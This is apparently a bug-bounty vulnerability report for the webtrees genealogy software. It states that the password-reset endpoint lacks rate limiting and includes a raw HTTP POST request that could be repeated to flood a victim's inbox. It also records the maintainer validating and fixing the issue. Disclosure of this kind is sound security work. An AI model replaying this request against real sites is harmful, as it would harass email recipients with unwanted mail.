Insufficient Granularity of Access Control in fisharebest/webtrees


Reported on

Sep 29th 2021


There is not rate limit protection , Rate limit bypass sent unlimited email victim or any email address.

Proof of Concept

There is no rate limit password-request , attacker to send unlimited email to victim or any email address.

POST /demo-stable/index.php?route=%2Fdemo-stable%2Fpassword-request%2Fdemo HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Connection: close
Cookie: __Secure-WT-ID=sdh1q5pp24lj80hqqkvqqauamg
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1


Post data email= parameter value to victim mail. this request unlimited time and victim email address will received unlimited verification email .


Attacker can sent unlimited email to any mail address

We have contacted a member of the fisharebest/webtrees team and are waiting to hear back 2 years ago
Greg Roach validated this vulnerability 2 years ago
Raptor has been awarded the disclosure bounty
The fix bounty is now up for grabs
Greg Roach marked this as fixed with commit 9ed332 2 years ago
Greg Roach has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation